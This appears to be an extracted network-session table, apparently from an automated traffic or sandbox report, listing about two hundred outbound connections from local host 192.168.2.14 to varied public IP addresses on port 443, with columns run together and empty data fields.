                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16209192.168.2.1436418208.134.48.99443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16210192.168.2.1451336213.220.109.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16211192.168.2.1454652170.175.72.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16212192.168.2.1440022141.213.202.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16213192.168.2.1458686217.223.131.103443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16214192.168.2.1445660169.36.223.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16215192.168.2.145351095.84.119.53443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16216192.168.2.1456730165.185.186.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16217192.168.2.1438626148.200.162.112443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16218192.168.2.1459382185.199.34.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16219192.168.2.143737875.218.192.15443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16220192.168.2.1447740157.2.118.44443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16221192.168.2.1448880218.95.114.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16222192.168.2.1447004208.142.241.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16223192.168.2.143932631.5.124.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16224192.168.2.1460296169.157.48.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16225192.168.2.143679073.145.208.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16226192.168.2.1446526120.75.95.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16227192.168.2.145783888.87.132.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16228192.168.2.144297412.37.156.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16229192.168.2.143822290.60.106.246443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16230192.168.2.1459150165.87.0.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16231192.168.2.1458576119.82.83.9443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16232192.168.2.1442788100.61.225.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16233192.168.2.145516079.124.188.175443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16234192.168.2.1460600207.102.221.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16235192.168.2.145352284.50.220.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16236192.168.2.143585413.135.75.209443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16237192.168.2.1453944104.156.56.169443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16238192.168.2.1445674143.148.134.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16239192.168.2.1439568134.147.127.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16240192.168.2.143856667.73.135.87443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16241192.168.2.1440278222.163.81.160443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16242192.168.2.1454632117.140.50.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16243192.168.2.1436920194.214.43.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16244192.168.2.1445220172.147.32.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16245192.168.2.1455152108.220.148.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16246192.168.2.145551486.12.184.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16247192.168.2.144113466.47.27.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16248192.168.2.1434884186.59.47.99443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16249192.168.2.145124660.227.22.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16250192.168.2.144601412.193.223.202443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16251192.168.2.143539224.118.253.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16252192.168.2.145321040.173.211.185443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16253192.168.2.1434942151.75.206.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16254192.168.2.1455228103.9.216.248443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16255192.168.2.1442014223.196.102.2443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16256192.168.2.14597744.114.66.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16257192.168.2.144074682.249.49.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16258192.168.2.1438998115.137.116.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16259192.168.2.1435750186.24.159.237443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16260192.168.2.144641896.23.195.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16261192.168.2.1448428159.211.181.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16262192.168.2.1435056213.67.125.87443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16263192.168.2.1450652145.212.135.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16264192.168.2.1435038196.148.207.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16265192.168.2.143421065.224.105.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16266192.168.2.144599258.174.57.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16267192.168.2.145562666.125.93.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16268192.168.2.143389875.214.136.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16269192.168.2.1451606167.69.148.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16270192.168.2.144893244.113.58.212443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16271192.168.2.1445274115.239.78.148443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16272192.168.2.1458720122.142.53.226443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16273192.168.2.144501470.220.226.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16274192.168.2.143933447.93.87.36443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16275192.168.2.145041663.113.165.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16276192.168.2.1440496195.185.55.37443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16277192.168.2.1441120209.17.59.137443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16278192.168.2.1438278113.5.158.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16279192.168.2.1457528203.240.32.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16280192.168.2.1434532216.134.167.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16281192.168.2.1450788211.176.153.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16282192.168.2.144139883.25.115.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16283192.168.2.144953078.11.175.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16284192.168.2.1456790191.152.127.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16285192.168.2.144022641.39.119.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16286192.168.2.1445628111.247.80.41443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16287192.168.2.1437634104.0.199.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16288192.168.2.1451108147.188.60.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16289192.168.2.143669254.227.218.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16290192.168.2.1433758223.35.97.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16291192.168.2.1452156148.74.88.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16292192.168.2.144120092.4.204.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16293192.168.2.145316434.170.192.108443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16294192.168.2.143531085.187.185.220443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16295192.168.2.1459152185.162.136.110443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16296192.168.2.144930897.184.232.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16297192.168.2.1450760142.201.63.167443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16298192.168.2.1460894221.135.184.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16299192.168.2.144952839.212.12.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16300192.168.2.1446078132.64.45.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16301192.168.2.1451774156.238.83.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16302192.168.2.14424348.192.242.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16303192.168.2.14583625.187.163.65443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16304192.168.2.1437108147.8.220.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16305192.168.2.144086854.193.173.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16306192.168.2.1437320136.211.144.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16307192.168.2.144820231.165.5.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16308192.168.2.1450858162.89.180.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16309192.168.2.1450956140.194.78.156443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16310192.168.2.144323618.138.86.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16311192.168.2.1436824210.179.148.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16312192.168.2.1460152212.81.75.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16313192.168.2.1458324145.186.141.181443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16314192.168.2.1449990150.123.64.2443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16315192.168.2.1446322222.145.138.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16316192.168.2.143981439.187.165.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16317192.168.2.143751242.150.255.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16318192.168.2.1441700128.135.193.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16319192.168.2.1458498113.26.205.164443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16320192.168.2.1441916195.54.126.103443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16321192.168.2.144066820.140.29.33443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16322192.168.2.144823838.198.158.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16323192.168.2.144744261.36.83.46443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16324192.168.2.1450764212.199.232.97443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16325192.168.2.1440370196.40.198.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16326192.168.2.1434154156.54.80.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16327192.168.2.1434186118.173.97.245443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16328192.168.2.143380657.66.33.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16329192.168.2.1443206107.64.177.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16330192.168.2.1456084200.225.236.33443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16331192.168.2.143411465.27.56.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16332192.168.2.145657046.190.167.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16333192.168.2.144469027.115.135.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16334192.168.2.143899496.197.46.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16335192.168.2.144311451.192.102.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16336192.168.2.1437638122.145.55.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16337192.168.2.1456048194.37.167.226443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16338192.168.2.1433842183.53.70.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16339192.168.2.1433394211.49.3.0443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16340192.168.2.144882027.1.65.140443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16341192.168.2.144925032.201.236.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16342192.168.2.144351469.187.152.157443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16343192.168.2.1451490103.195.251.10443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16344192.168.2.145608413.171.0.248443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16345192.168.2.143403657.170.16.156443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16346192.168.2.1442644166.174.38.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16347192.168.2.14422908.76.59.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16348192.168.2.1443686159.33.34.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16349192.168.2.1452256151.64.173.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16350192.168.2.1455512123.169.238.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16351192.168.2.1459108212.188.248.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16352192.168.2.145299242.8.84.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16353192.168.2.1458854124.7.144.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16354192.168.2.1437068217.255.188.140443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16355192.168.2.1444244101.114.106.78443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16356192.168.2.1455254111.27.120.143443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16357192.168.2.14554829.208.3.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16358192.168.2.14528981.124.23.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16359192.168.2.1445106164.190.236.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16360192.168.2.143593681.211.55.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16361192.168.2.144659818.121.7.229443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16362192.168.2.1445112123.213.205.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16363192.168.2.14516422.149.175.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16364192.168.2.1448828108.80.131.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16365192.168.2.1456616108.28.146.11443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16366192.168.2.143365443.53.220.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16367192.168.2.1441864137.175.206.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16368192.168.2.144407652.120.72.44443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16369192.168.2.1453800209.229.74.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16370192.168.2.1442462216.180.145.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16371192.168.2.144028691.98.74.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16372192.168.2.145124813.1.8.249443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16373192.168.2.1444676141.79.21.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16374192.168.2.1434998205.161.153.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16375192.168.2.145206670.162.139.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16376192.168.2.1444110196.61.153.33443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16377192.168.2.144012462.213.205.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16378192.168.2.144942288.178.189.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16379192.168.2.144274018.177.165.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16380192.168.2.143511271.238.136.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16381192.168.2.1445266185.170.33.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16382192.168.2.1454448174.214.73.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16383192.168.2.1439040199.170.2.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16384192.168.2.1438700216.137.191.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16385192.168.2.1447348132.59.187.229443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16386192.168.2.1440312123.229.138.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16387192.168.2.1434372156.106.250.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16388192.168.2.1450120130.113.114.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16389192.168.2.144882444.47.153.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16390192.168.2.1451374156.240.208.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16391192.168.2.143792219.191.18.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16392192.168.2.1440114117.248.80.185443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16393192.168.2.1457850176.211.226.97443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16394192.168.2.1443074185.116.149.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16395192.168.2.1450054145.203.47.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16396192.168.2.1443862165.163.14.185443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16397192.168.2.1447290207.36.74.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16398192.168.2.1442100207.169.209.229443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16399192.168.2.1460772125.5.9.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16400192.168.2.1448324218.137.219.176443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16401192.168.2.1456838190.199.39.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16402192.168.2.1452186160.0.230.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16403192.168.2.1453986197.202.224.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16404192.168.2.1453286158.77.63.98443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16405192.168.2.145269644.93.0.87443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16406192.168.2.1457114218.91.27.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16407192.168.2.144413652.74.180.98443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16408192.168.2.144741846.36.101.78443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16409192.168.2.144833671.80.125.33443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16410192.168.2.1456600191.6.175.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16411192.168.2.143368466.168.171.209443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16412192.168.2.1442194111.99.91.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16413192.168.2.144137620.156.163.193443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16414192.168.2.1442198204.7.214.162443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16415192.168.2.1436964181.231.215.4443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16416192.168.2.1441004159.198.49.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16417192.168.2.143409274.6.161.245443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16418192.168.2.1442036165.92.41.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16419192.168.2.1445104223.88.110.221443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16420192.168.2.145559496.249.47.5443
                                                      TimestampBytes transferredDirectionData


